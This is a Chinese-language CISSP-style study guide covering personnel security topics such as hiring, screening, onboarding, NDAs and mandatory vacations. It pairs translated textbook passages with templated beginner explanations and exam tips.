读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

COBIT 常用于治理、控制、审计和业务价值。

题目强调业务需求驱动架构时留意 SABSA。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
COBIT COBIT 偏 IT 治理和控制目标。
SABSA SABSA 强调业务驱动、风险导向的安全架构。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 02 / PDF P141

安全治理:定方向、定责任、定监督

治理负责让安全和组织目标对齐,并形成可监督的体系。

教材原文段落

1.12.2 Periodic content reviews to include emerging technologies and trends (e.g., cryptocurrency, artificial intelligence (Al), blockchain) 1.12.3 Program effectiveness evaluation Additional elements of this domain are discussed in various chapters: Chapter 1, “Security Governance Through Principles and Policies” Chapter 3, “Business Continuity Planning” Chapter 4, “Laws, Regulations, and Compliance” Please review all of these chapters to have a complete perspective on the topics of this domain. Personnel Security Policies and Procedures Humans are often considered the weakest element in any security solution.

No matter what physical or logical controls are deployed, humans can discover ways to avoid, circumvent, subvert, or disable them. Thus, it is important to consider your users' humanity when designing and deploying security solutions for your environment. To understand and apply security governance, you must address the potentially weakest link in your security chain—people. However, people can also become a key security asset when they are properly trained and motivated to protect not only themselves but the security of the organization. It is important to not treat personnel as a problem to be solved, but as people who can become valued partners in a security endeavor.

Issues, problems, and compromises related to humans occur at all stages of a security solution development. This is because humans are involved throughout any solution's development, deployment, and ongoing management. Therefore, you must evaluate the effect users, designers, programmers, developers, managers, vendors, consultants, and implementers have on the process. Job Descriptions and Responsibilities 1.12.2

中文直译 / 整理

定期内容审查,涵盖新兴技术和趋势(例如,加 密货币、人工智能(AI)、区块链) 1.12.3 程序有效性评估 本领域的其他要素将在以下各章中讨论: 第1章,“通过原则和政策实现安全治理” 第3章,“业务连续性规划” 第4章,“法律、法规与合规” 请审查所有这些章节,以全面了解本领域的主题。 人员安全政策和程序 人类通常被认为是任何安全解决方案中最薄弱的环节。 无论部署了何种物理 或逻辑控制措施,人类总能找到规避、绕过、破坏或禁用这些措施的方法。 因此,在为您的环境设计和部署安全解决方案时,必须考虑用户的本质属性。 要理解和应用安全治理,您必须应对安全链条中可能最薄弱的一环——人。 然而,当人员得到适当的培训并被激励去保护自己以及组织的安全时,他们也 可以成为关键的安全资产。 重要的是,不要将人员视为需要解决的问题,而应 视他们为安全事业中值得信赖的合作伙伴。 在安全解决方案开发的各个阶段,都会出现与人类相关的问题、难题和妥协。 这是因为人类贯穿于任何解决方案的开发、部署和持续管理全过程。 因此,您 必须评估用户、设计人员、程序员、开发人员、管理人员、供应商、顾问和实 施人员对这一过程的影响。 职位描述与职责

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:治理负责让安全和组织目标对齐,并形成可监督的体系。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全治理:定方向、定责任、定监督”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 03 / PDF P142

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Hiring new staff typically involves several distinct steps: creating a job description or position description, setting a classification for the job, screening employment candidates, and hiring and training someone best suited for the job. Without a job description, there is no consensus on what type of individual should be hired. Any job description for any position within an organization should address relevant security issues, such as whether the position requires handling sensitive material or access to classified information. In effect, the job description defines the roles to which an employee needs to be assigned to perform their work tasks.

Job roles typically align to a rank or level of privilege, whereas job descriptions map to specifically assigned responsibilities and tasks. Job responsibilities are the specific work tasks an employee is required to perform regularly. Employees require access to various objects, resources, and services depending on their responsibilities. Job responsibilities should be detailed in a job description. Thus, a list of job responsibilities guides the assignment of access rights, permissions, and privileges. On a secured network, users must be granted access privileges for those elements related to their work tasks.

Job descriptions are not used exclusively for the hiring process; they should be maintained throughout the organization's life. Only through detailed job descriptions can a comparison be made between what a person should be responsible for and what they actually are responsible for. Managers should audit privilege assignments to ensure that workers do not obtain access that is not strictly required for them to accomplish their work tasks. Candidate Screening and Hiring Employment candidate screening for a specific position is based on the sensitivity and classification defined by the job description.

Thus, the thoroughness of the screening process should reflect the security of the position to be filled. Employment candidate screening, background checks, reference checks, education verification, and security clearance validation are essential elements in proving that a candidate is adequate, qualified, and trustworthy for a secured position. Background checks include obtaining a candidate's work and educational history; checking references; verifying education; interviewing colleagues; checking police and government records for arrests or illegal activities; verifying identity through fingerprints, driver's license,

中文直译 / 整理

招聘新员工通常涉及几个明确的步骤:创建职位描述或岗位描述、为职位设定 分类、筛选求职者,以及聘用和培训最适合该职位的人选。 如果没有职位描述, 就无法就应招聘何种人员达成共识。 组织内任何职位的职位描述都应涵盖相关 的安全问题,例如该职位是否需要处理敏感材料或访问机密信息。 实际上,职 位描述定义了员工为完成工作任务需要被分配的角色。 职位角色通常与级别或 权限等级相对应,而职位描述则对应具体分配的职责和任务。 工作职责是员工需要定期执行的具体工作任务。 员工根据其职责需要访问各 种对象、资源和服务。 工作职责应在职位描述中详细说明。 因此,工作职责 列表可指导访问权限、许可和特权的分配。 在安全网络中,用户只能被授予 与其工作任务相关的元素的访问特权。 职位描述不仅用于招聘过程; 它们应在组织的整个生命周期中得到维护。 只 有通过详细的职位描述,才能比较一个人应承担的责任与实际承担的责任。 管理者应审计权限分配,以确保员工不会获得与其完成工作任务无关的访问 权限。 候选人筛选与招聘 针对特定职位的雇用候选人筛选基于职位描述所定义的敏感性和分类。 因此,筛选过程的细致程度应反映待填补职位的安全级别。

招聘候选人筛选、背景调查、推荐人核查、学历验证和安全许可验证是证明 候选人具备胜任安全岗位的能力、资质和可信度的关键环节。 背景调查包括 获取候选人的工作和教育经历; 核查推荐人; 验证学历; 访谈同事; 查询警 方和政府记录以确认是否有逮捕或非法活动; 通过指纹、驾照

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

ISO 偏标准和管理体系。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 04 / PDF P143

第 143 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

and/or birth certificate; and holding a personal interview. Depending on the job position, this process could also include skill challenges, drug testing, credit checks, checking driving records, and personality testing/evaluation. Performing online background checks and reviewing the social networking accounts of applicants has become standard practice for many organizations. If a potential employee has posted inappropriate materials online, then they are not as promising a candidate as those who did not.

A general picture of a person's attitude, intelligence, loyalty, common sense, diligence, honesty, respect, consistency, and adherence to social norms and/or corporate culture can be gleaned quickly by viewing a person's online identity. However, being fully aware of the legal restrictions against discrimination is essential. Various countries have vastly different freedoms or limitations on background checks, especially criminal history research. Always confirm with your legal department before evaluating an applicant's online persona.

During the initial applicant review process, the human resources (HR) staff are looking to confirm that a candidate is appropriately qualified for a job, but they are also on the lookout for issues that would disqualify the applicant. Interviewing qualified applicants is the next filter to eliminate those not suited for the job or the organization. When conducting interviews, it is important to have a standardized interview process in order to treat each candidate fairly. Although some aspects of an interview are subjective and based on the interplay of personalities of the candidates and the interviewer, the decision whether or not to hire someone needs to be legally defensible.

Onboarding: Employment Agreements and Policy-Driven Requirements Once a qualified but not-disqualified candidate is found and interviewed, they can be offered the job. If accepted, the new hire will need to be integrated into the organization. This process is known as onboarding. As with all tasks within a security-focused organization, the process of onboarding should be guided by policy-driven requirements. Onboarding is the process of adding new employees to the organization, having them review and sign employment agreements and policies, be introduced to managers and coworkers, and be trained in employee operations and logistics.

Onboarding can also include organizational socialization and orientation. This is the process by which new employees are trained in order to be properly prepared for performing their job

中文直译 / 整理

和/或出生证明核实身份; 并进行面谈。 根据职位不同,此过程还可能包 括技能测试、药物检测、信用审查、驾驶记录核查以及性格测试/评估。 对求职者进行在线背景调查并审查其社交媒体账户,已成为许多组织的常规做 法。 如果潜在雇员在网上发布了不适当的内容,那么他们作为候选人的吸引力 就不及那些没有这样做的候选人。 通过查看一个人的在线身份,可以迅速了解 其态度、智力、忠诚度、常识、勤奋程度、诚实性、尊重、一致性以及对社会 规范和/或企业文化的遵守情况。 然而,必须充分了解关于歧视的法律限制。 不同国家在 背景调查,尤其是犯罪记录调查方面,自由或限制差异巨大。 在评估求职者的在线形象 之前,请务必与法务部门确认。 在初步审查求职者的过程中,人力资源(HR)人员旨在确认候选人是否具备胜 任该职位的资格,同时也在留意可能导致其不符合条件的问题。 面试合格的求职者是进一步筛选不适合该职位或组织人员的下一个环节。 在进 行面试时,必须采用标准化的面试流程,以确保公平对待每位候选人。 尽管面 试中某些方面具有主观性,取决于候选人与面试官之间个性的互动,但是否录 用某人的决定必须具有法律上的可辩护性。

入职:雇佣协议与政策驱动的要求 一旦找到合格且未被排除的候选人并完成面试,即可向其提供职位。 如果候选 人接受,新员工需要被整合到组织中。 这一过程被称为入职。 与安全导向型组 织中的所有任务一样,入职过程应由政策驱动的要求指导。 入职是将新员工加入组织的过程,包括让他们审阅并签署雇佣协议和政策,认 识经理和同事,并接受员工运营与后勤方面的培训。 入职还可包括组织社会化 和导向。 这是通过培训使新员工充分准备好胜任工作的过程。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

法律可辩护:安全动作要能在审计、监管或法庭上解释清楚,有授权、有记录、有依据。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 143 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

调查、监控、处罚、取证题先看合法授权、政策和证据链。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

证书不是密钥本身,而是身份与公钥的可信绑定。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
法律可辩护 安全动作要能在审计、监管或法庭上解释清楚,有授权、有记录、有依据。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 05 / PDF P144

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

responsibilities. It can include training, job skill acquisition, and behavioral adaptation in an effort to integrate employees efficiently into existing organizational culture, processes, and procedures. Well-designed onboarding can result in higher levels of job satisfaction, higher levels of productivity, faster integration with existing workers, a rise in organizational loyalty, stress reduction, and a decreased resignation rate. A new employee will often be provided with a computer/network user account. This is accomplished through the identity and access management (IAM) system of an organization, which will provision the account and assign necessary privileges and access.

The onboarding process is also used when an employee's role or position changes or when that person is awarded additional levels of privilege or access. To maintain security, access should be assigned according to the principle of least privilege. The principle of least privilege states that users should be granted the minimum amount of access necessary for them to complete their required work tasks or job responsibilities. True application of this principle requires low-level granular control over all resources and functions. Further discussion of least privilege is in Chapter 16, “Managing Security Operations.” When a new employee is hired, they should sign an employment agreement.

Such a document outlines the rules and restrictions of the organization, the security policy, details of the job description, violations and consequences, and the minimum or probationary length of time the position is to be filled by the employee. These items might be separate documents, such as an acceptable use policy (AUP). In such a case, the employment agreement is used to verify that the employment candidate has read and understood the associated documentation and signed their agreement to adhere to the necessary policies related to their prospective job position.

An acceptable use policy (AUP) defines what is and what is not an acceptable activity, practice, or use for company equipment and resources. The AUP is specifically designed to assign security roles within the organization as well as prescribe the responsibilities tied to those roles. This policy defines a level of acceptable performance and expectations of behavior and activity. Failure to comply with the policy may result in job action warnings, penalties, or termination.

中文直译 / 整理

职责。 它可包括培训、工作技能获取和行为适应,以帮助员工高效融入现有的 组织文化、流程和程序。 设计良好的入职流程可带来更高的工作满意度、更高 的生产力、更快地融入现有团队、增强组织忠诚度、减轻压力以及降低离职率。 新员工通常会获得一个计算机/网络用户账户。 这通过组织的身份和访问管理 (IAM)系统完成,该系统会 provision 账户并分配必要的权限和访问权限。 当员工的角色或职位发生变化,或该人获得额外的权限或访问级别时,也会使 用入职流程。 为保持安全,访问权限应根据最小权限原则分配。 最小权限原则指出,用户应 被授予完成其所需工作任务或岗位职责所必需的最少访问权限。 真正应用这一 原则需要对所有资源和功能进行细粒度的控制。 有关最小权限的进一步讨论见 第16章,“安全管理操作”。 当雇佣新员工时,他们应签署一份雇佣协议。 此类文件概述了组织的规则和限 制、安全策略、职位描述细节、违规行为及后果,以及该职位由员工担任的最 短或试用期限。 这些内容可能是独立的文件,例如可接受使用政策(AUP)。 在这种情况下,雇佣协议用于核实应聘者已阅读并理解相关文档,并签署同意 遵守与其拟任职位相关的必要政策。

可接受使用政策(AUP)定义了公司设备和资源的可接受与不可接受 的活动、实践或用途。 AUP 专门用于分配组织内的安全角色,并规定与这 些角色相关的责任。 该政策定义了可接受的行为和活动水平及期望。 违反 本政策可能导致工作警告、处罚或解雇。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
学习单元 06 / PDF P145

第 145 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

In addition to employment agreements, there may be other security-related documentation and policy-driven requirements that must be addressed. One common document is a nondisclosure agreement (NDA). An NDA is used to protect confidential information within an organization from being disclosed by a current or former employee. Violations of an NDA are often met with strict penalties. Throughout a worker's employment, they may be asked to sign additional NDAs as their job responsibilities change and they need to access new sensitive, proprietary, or confidential assets.

When an employee leaves the organization, they should be reminded of their legal obligation to maintain silence on all items covered by any signed NDAs. In fact, they may be required to re-sign the NDA upon departure as a means to legally confirm that they are fully aware of their legally recognized obligation to maintain trade secrets and other confidential information. There are several forms of NDA to be aware of. A unilateral NDA, also known as a one-way NDA, is used when one party needs to share sensitive information with another party while retaining control and protection over that information.

A bilateral NDA (aka mutual NDA or two-way NDA) is a legally binding contract between two parties, often individuals or organizations, where both parties agree to protect each other's confidential information. A multilateral NDA is a legal contract involving three or more parties, each of whom agrees to protect and keep confidential the sensitive information shared by the other parties. Another potential element of an employment contract is a non-compete agreement (NCA). A non-compete agreement, often called a non-compete clause or covenant not to compete (CNC), is a legal contract between an employer and an employee, a business and an independent contractor, or between business partners.

The primary purpose of a non-compete agreement is to restrict the ability of one party (usually the employee or business partner) from engaging in competitive activities or working for a competing entity, typically within a specific geographical area and for a defined duration, after the termination of their relationship with the other party. Non-compete agreements are common in various industries to protect a business's interests, trade secrets, and client relationships.

However, their enforceability can vary by jurisdiction, and there are often legal restrictions on the extent to which non-compete agreements can be applied, as they must strike a reasonable balance between protecting a business's legitimate interests and an individual's right to pursue their livelihood. Before entering into or enforcing a non-compete agreement, seeking legal counsel to ensure

中文直译 / 整理

除雇佣协议外,还可能有其他与安全相关的文档和政策要求需要处理。 一个常 见的文档是保密协议(NDA)。 NDA 用于保护组织内的机密信息不被现任或 前任员工泄露。 违反 NDA 通常会受到严格处罚。 在员工任职期间,随着其工 作职责的变化以及需要访问新的敏感、专有或机密资产,他们可能被要求签署 额外的 NDA。 当员工离开组织时,应提醒其法律义务,即对任何已签署 NDA 所涵盖的所有事项保持保密。 事实上,他们离职时可能被要求重新签署 NDA,以法律方式确认其充分知晓其依法承担的保守商业秘密和其他机密信息 的义务。 有几种类型的保密协议需要注意。 单边保密协议,也称为单向保密协议,用于 一方需要与另一方共享敏感信息,同时保留对该信息的控制和保护。 双边保密 协议(又称互惠保密协议或双向保密协议)是双方(通常是个人或组织)之间 具有法律约束力的合同,双方同意保护对方的机密信息。 多边保密协议是一种 涉及三方或更多方的法律合同,各方均同意保护并保密其他方共享的敏感信息。 雇佣合同的另一个潜在要素是竞业禁止协议(NCA)。

竞业禁止协议通常被称 为竞业禁止条款或不竞争契约(CNC),是雇主与雇员、企业与独立承包商, 或商业伙伴之间的一种法律合同。 竞业禁止协议的主要目的是限制一方(通常 是雇员或商业伙伴)在与另一方的关系终止后,在特定地理区域和规定期限内 从事竞争性活动或为竞争实体工作。 竞业禁止协议广泛应用于各个行业,以保 护企业的利益、商业秘密和客户关系。 然而,其可执行性因司法管辖区而异, 通常对竞业禁止协议的适用范围有法律限制,因为必须在保护企业的合法利益 与个人追求生计的权利之间取得合理平衡。 在签订或执行竞业禁止协议之前, 建议寻求法律咨询以确保

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 145 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

IPS 放在线路中,误报可能影响可用性。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 07 / PDF P146

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

that it complies with applicable laws and regulations in a specific jurisdiction is advisable. Employee Oversight Throughout the employment lifetime of personnel, managers should regularly review or audit the job descriptions, work tasks, privileges, and responsibilities for every staff member. It is common for work tasks and privileges to drift over time. Drifting job responsibilities or privilege creep can also result in security violations. Excess privileges held by a worker represent an increased risk to the organization.

That risk includes the greater chance for mistakes to damage asset confidentiality, integrity, and availability (CIA) outside of the worker's actual responsibilities, greater ability for a disgruntled worker to cause harm on purpose, and greater ability for an attack that takes over a worker's account to cause harm. Reviewing and then adjusting user capabilities to realign with the principle of least privilege is a risk-reduction strategy. For some organizations, mostly those in the financial industry, a key part of this review process is enforcing mandatory vacations. Mandatory vacations are used as a peer review process.

This process requires a worker to be away from the office and without remote access for one to two weeks per year. While the worker is on “vacation,” a different worker (i.e., an auditor) performs the work duties (potentially with the same account), which makes it easier to verify the work tasks and privileges of workers while attempting to detect abuse, fraud, or negligence. This does not mean that passwords are shared. Mandatory vacation auditing could be implemented by redefining the target worker's account's password for the auditor, then redefining the password again when the worker returns.

Or another account could be created for the auditor with the same access, permissions, and privileges as the worker's. Other user and worker management and evaluation techniques include separation of duties, job rotation, and cross-training. These concepts are discussed in Chapter 16. When several people work together to perpetrate a crime, it's called collusion. Employing the principles of separation of duties, restricted job responsibilities, mandatory vacations, job rotation, and cross-training reduces the likelihood that a coworker will be willing to collaborate on an illegal or abusive scheme because of the higher risk of detection, reporting, or

中文直译 / 整理

其符合特定司法管辖区适用的法律法规。 员工监督 在员工的整个雇佣周期内,管理者应定期审查或审计每位员工的工作描述、工 作任务、权限和职责。 随着时间推移,工作任务和权限往往会发生偏移。 职责 漂移或权限膨胀也可能导致安全违规。 员工持有的过多权限会增加组织的风险。 这种风险包括:员工在实际职责之外更有可能因失误而损害资产的机密性、完 整性和可用性(CIA); 不满的员工更有可能故意造成损害; 以及攻击者接管员 工账户后更有可能造成破坏。 通过审查并调整用户权限,使其重新符合最小权 限原则,是一种降低风险的策略。 对于某些组织,尤其是金融行业中的组织,这一审查过程的关键部分是强制休 假。 强制休假被用作一种同行审查机制。 该机制要求员工每年离开办公室且不 得远程访问一至两周。 在员工"休假"期间,另一名员工(即审计员)将执行其工 作职责(可能使用同一账户),从而更容易核实员工的工作任务和权限,并检 测滥用、欺诈或疏忽行为。 这并不意味着共享密码。 强制休假审计可以通过为 审计员重新设置目标员工账户的密码来实现,待员工返回后再重新设置密码。 或者,也可以为审计员创建一个具有与员工相同访问权限、权限和特权的账户。

其他用户和工作人员的管理与评估技术包括职责分离、岗位轮换和交叉培 训。 这些概念将在第16章中讨论。 当多人合作实施犯罪时,这被称为串通。 通过应用职责分离、限制岗位职责、 强制休假、岗位轮换和交叉培训的原则,可以降低同事愿意参与非法或滥用行 为的可能性,因为被发现、举报或

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

没有日志和身份绑定,就很难问责。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
审计 审计记录主体行为,用于追责、复盘和取证。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
审计 审计检查控制是否存在、是否有效、是否符合要求。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 08 / PDF P147

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

whistleblowing. Collusion and other privilege abuses can also be reduced through strict monitoring of special privileges and privileged accounts, such as those of an administrator, root, and others. For many job positions that are considered sensitive or critical, especially in medical, financial, government, and military organizations, periodic revaluation of employees may be needed.

This could be a process that is just as thorough as the original background check and investigation performed when the individual was hired, or it may require performing only a few specific checks to confirm consistency in the person's qualifications as well as researching for any new information regarding disqualifications. User behavior analytics (UBA) and user and entity behavior analytics (UEBA) are the concepts of analyzing the behavior of users, subjects, visitors, customers, and so forth for some specific goal or purpose.

